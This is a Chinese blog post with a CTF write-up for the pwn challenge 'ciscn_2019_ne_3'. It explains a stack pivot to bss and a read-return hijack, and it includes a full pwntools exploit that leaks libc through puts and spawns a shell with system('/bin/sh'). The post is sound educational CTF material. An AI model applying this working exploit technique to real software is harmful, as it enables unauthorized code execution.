ciscn_2019_ne_3

最新推荐文章于 2023-04-13 17:35:10 发布
最新推荐文章于 2023-04-13 17:35:10 发布
阅读量427 收藏
点赞数 1
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/105865976
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

ciscn_2019_ne_3

(在rop长度过小情况下,通过read劫持read自身的返回来达到后续大量rop)

首先检查一下程序的保护机制

 

然后,我们用IDA分析一下,32位栈溢出,难点在于结束变更了两次esp,因此,我们单纯的溢出,直接会造成esp变更到一个无效的地址处。

因此,我们需要将将ecx覆盖为bss段,将栈切换到bss上进行rop。但是切换到bss之前,需要先在bss段布置好rop才行。由此,程序一开始处,叫我们输入长度时,能够输入16字节,并且数据保存在bss段,16字节,前4字节,我们用来存储长度值-1,然后,我们可以布置下3条rop gadget。

3条gadgets,单纯的read调用完成不了,我们可以ret2text,调用text里的read。

至于读取数据到哪里,这是关键,我们要利用read来劫持read自己的返回地址。这样,read结束后就不会返回到text后面执行,而是进入劫持后的流。

payload = '-1\n\x00' + p32(text_read) + p32(bss) + p32(0x100)
sh.sendafter('length of password:',payload)
#栈迁移到bss上
payload = 'a'*0x48 + p32(bss + 8)
sh.sendlineafter(':',payload)

 

如图,我们利用read,向read函数自身的返回地址输入数据,这样就可以劫持read返回到后续输入的rop里。后续rop里,我们要继续做一个栈迁移,因为要调用puts等函数,需要开辟较大的栈空间,因此,我们需要将栈向后迁移0x600。

#coding:utf8
from pwn import *

sh = process('./ciscn_2019_ne_3')
#sh = remote('node3.buuoj.cn',25625)
elf = ELF('./ciscn_2019_ne_3')
libc = ELF('/lib32/libc-2.27.so')
read_plt = elf.plt['read']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_ebp = 0x0804881b
pop_3 = 0x08048819
leave_ret = 0x08048575
bss = 0x0804A060
text_read = 0x080486D0
sh.sendlineafter(':','haivk')

#通过劫持read的返回的地址,来达到进一步的利用
payload = '-1\n\x00' + p32(text_read) + p32(bss) + p32(0x100)

sh.sendafter('length of password:',payload)
#栈迁移到bss上
payload = 'a'*0x48 + p32(bss + 8)
#raw_input()
sh.sendlineafter(':',payload)
#raw_input()
rop = p32(pop_ebp) + p32(bss + 0x600 - 4) + p32(read_plt) + p32(leave_ret) + p32(0) + p32(bss + 0x600) + p32(0x100)
sh.sendafter('well, please contiune\n',rop)
#调用puts后,继续调用read输入后续rop
rop2 = p32(puts_plt) + p32(pop_ebp) + p32(puts_got) + p32(read_plt) + p32(pop_3) + p32(0) + p32(bss + 0x600 + 0x20) + p32(0x100)
sleep(0.5)
#raw_input()
sh.send(rop2)
puts_addr = u32(sh.recv(4))
libc_base = puts_addr - libc.sym['puts']
system_addr = libc_base + libc.sym['system']
binsh_addr = libc_base + libc.search('/bin/sh').next()
print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)
print 'binsh_addr=',hex(binsh_addr)
rop3 = p32(system_addr) + p32(0) + p32(binsh_addr)
sh.send(rop3)

sh.interactive()

 

ha1vk
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ciscn_2019_n_3 题解
lifanxin的博客
12-30 586
Write Up知识点关键字样本运行静态分析求解思路求解脚本 知识点关键字 UAF fastbin 样本 ciscn_2019_n_3 运行 检查样本   32位小端程序,开启了栈保护和NX保护。 运行样本   样本的运行结果如上图所示:该程序主要模仿了一个笔记管理的功能,选项1可以开辟新的节点,会让选中是整型还是文本;选项2会让我们根据索引删除一个节点;选型3可以打印一个节点中存储的数据信息;选项4主要是打印一个随机生成的金钱数目,告诉你没法购买Pro版本。   此处不赘述也不一一截图运行结果,读者可
ciscn_2019_en_3
fayinq的博客
03-14 441
ciscn_2019_en_3 首先写在前面的话,这道题找到关键点之后不能说十分简单,只能说非常的简单,但是这个题还是卡了我不久时间,最开始想了半天怎么泄露出libc地址,学过的方法全是不行,血压当场up。但是看了wp一眼之后就能秒杀了,当场高血压。 函数分析: Func_init(): Func_Execute(): 这其中本来是4个函数,但是show()和edit()函数没有东西,所以命名就省略了 Func_ADD(): Func_Free(): FREE的地方很明显,他
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:https://blog.csdn.net/A951860555/article/details/111991072
BUUCTF ciscn_2019_c_1(64位ret2libc3)
Rt1Text的博客
04-10 4503
1.checksec+运行 64位/NX保护 运行起来貌似很有意思,是一个加解密操作 后来发现只能加密不能解密 2. 强大的IDA进行中 1.main函数 貌似看不出什么 2.encrypt函数 加密具体操作 大小写字母/数字进行异或运算 发现gets()栈溢出 s大小0x50 需要先把加密函数绕过 该函数的功能就是循环对输入的字符串进行加密,在加密前都有一个检查,只要v0的值大于或等于字符串的长度就跳出循环,通过strlen来计算字符串长度的,strlen计算字.
ciscn_2019_ne_5
m0_52231248的博客
11-15 323
ciscn_2019_ne_5 Checksec: Ida: 首先会让我们输入密码,密码正确就会进入一个switch循环 我们看到循环中case4是调用catflag函数,跟进查看 Catflag函数中存在strcpy(dest,src)dest(offest)=0x44+4,只要我们能控制src就会存在溢出 再次回到main我们发现case1调用的addlog可以让我们输入src 于是思路就很清楚了先case1调用addlog输入我们的payload再case4将pa
ciscn-2019-ne-3
最新发布
11-08
【标题】"ciscn-2019-ne-3" 指向的可能是一个网络安全竞赛或挑战,其中 "ciscn" 可能代表 China International Security Conference Network 或类似的网络安全活动,而 "2019-ne-3" 也许是该活动2019年中的第三个...
UEFITool_NE_A51_win32.zip
12-24
3. **固件修改**:UEFITool可以用于修复或更新BIOS/UEFI固件,这对于解决启动问题或升级硬件支持非常有用。 4. **检测硬件组件**:工具可以帮助用户获取系统硬件信息,如内存、硬盘、网络设备等,以便于故障排查或...
110m_physical_地图_ne_110m_graticules_世界地图_physical_
09-28
3. ne_110m_land.cpg:陆地的栅格数据,表示地球表面的陆地区域。 4. ne_110m_lakes.cpg:湖泊的栅格数据,涵盖了全球的主要湖泊。 5. ne_110m_glaciated_areas.cpg:冰川覆盖区的数据,对于研究气候变化和冰川退缩...
ATOS.rar_ATOS NE_Atos
09-19
3. **传感器编程**:学习如何编写和集成传感器代码,处理数据采集、处理和传输。这可能涉及到对硬件接口的理解,如模拟输入/输出、定时器和串行通信等。 4. **网络通信**:Atos NE通常用于无线传感器网络,因此理解...
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
baby_pwn 赛题 ciscn 2019 第十二届全国大学生信息安全竞赛
Double ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之Double ciscn 2019 第十二届全国大学生信息安全竞赛
VerificationCode_C#_grew3ne_验证码_
10-01
3. **绘制验证码**:在创建的图像上绘制验证码。这需要利用`Graphics`类,通过`DrawString`方法将随机字符串画在图像上。为了增加复杂性,可以调整字体样式、大小、颜色,甚至添加旋转效果。 4. **添加噪声**:为了...
ciscn_2019_n_3题目细说
Tw0的博客
02-04 173
修正一些exp讲解思路不对的地方,讲述真正getshell的原理。
[CISCN2019 总决赛 Day2 Web1]Easyweb1
Mrs_H的博客
10-22 494
一.前言 在之前的文章中我提到最近一直在做sql注入相关的东西,也在一直做sql注入有关的题目。但是,事实上很多赛题他们的考点并不单一,往往需要结合着其他的知识,才能够拿到想要的结果。下面这道题就是我刚才所说的典型,虽然考的不难,但是足够说明当前sql题目的走向了。 二.正文 我们首先打开环境看到如下页面。 emmm,一个花里胡哨的登陆界面。尝试输入了很多用户名和密码组合,但是都不对。那就去扫一下目录,发现该网站存在一个robots.txt 这个robots文件中的内容就是在提示我们,该网站含有备份文件
[CISCN2019 总决赛 Day2 Web1]Easyweb
pakho_C的博客
09-11 836
访问,尝试id为1,2,3时都有图片,其他均没有显示,猜测盲注,尝试异或id=0^1和 0 ^ 0 无反应,换思路,扫描路径扫到敏感文件robots.txt,访问。这时的反斜杠\会将第二个单引号转义,使其变为普通字符,也就是说第一个单引号此时与第三个单引号闭合,id参数对应的值为。后缀成功绕过,但是它回显的并不是我上传文件的路径,而是上传文件的日志记录的路径。$id 变量 用于接收get型参数id的值,如果没有id参数将设置为1。,因为是字符串,所以反斜杠为转义字符,id会被解析为。
ciscn_2019_en_3【write up】
m0_73756460的博客
04-13 81
buu刷题 ciscn_2019_en_3【write up】
ffmpeg AV_NE
08-25
pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [GB28181国标平台测试软件...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值